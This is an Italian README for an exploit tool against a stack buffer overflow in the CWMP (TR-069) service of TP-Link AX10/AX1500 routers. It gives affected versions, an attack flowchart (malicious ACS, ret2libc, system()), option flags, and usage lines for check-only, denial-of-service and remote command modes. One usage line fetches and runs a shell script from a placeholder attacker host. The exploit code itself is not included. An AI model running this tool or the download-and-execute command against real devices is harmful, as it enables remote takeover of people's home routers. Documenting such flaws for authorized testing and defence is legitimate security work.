
Exploit per overflow del buffer dello stack su TP-Link AX10/AX1500 in CWMP (TR-069) che consente l'esecuzione remota di codice tramite ret2libc con bypass ASLR. Include modalità di solo controllo, DoS ed esecuzione di comandi.
TP-Link AX10/AX1500 CWMP Buffer Overflow RCE
Stack-based buffer overflow in CWMP (TR-069) che porta all'esecuzione remota di codice.
| Campo | Valore |
|---|---|
| Prodotto | TP-Link AX10, AX1500 |
| Affetto | AX10 < 1.2.1, AX1500 < 1.3.11 |
| CVSS | 8.6 (Alta) |
| Tipo | Stack Buffer Overflow |
| Vettore | CWMP/TR-069 (porta 7547) |
| Impatto | Esecuzione Remota di Codice |
flowchart LR
A[Attacker] --> B["Malicious ACS"]
B --> C["SetParameterValues"]
C --> D["Stack Overflow"]
D --> E["Overwrite PC"]
E --> F["ret2libc"]
F --> G["system()"]
G --> H["RCE"]
La vulnerabilità è nel processo cwmp che gestisce le richieste SOAP SetParameterValues. L'input viene utilizzato per calcolare la dimensione del buffer senza controlli sui limiti.
Sfruttamento:
python exploit.py <target_ip> --check-only
python exploit.py 192.168.0.1 --dos
python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"
Nessuno (usa la libreria standard)
Solo per test di sicurezza autorizzati.
| Flag | Descrizione | Predefinito |
|---|
-p, --port | Porta CWMP | 7547 |
-c, --command | Comando per RCE | nessuno |
-t, --timeout | Timeout del socket | 10 |
--dos | Solo modalità DoS | disattivato |
--check-only | Verifica se vulnerabile | disattivato |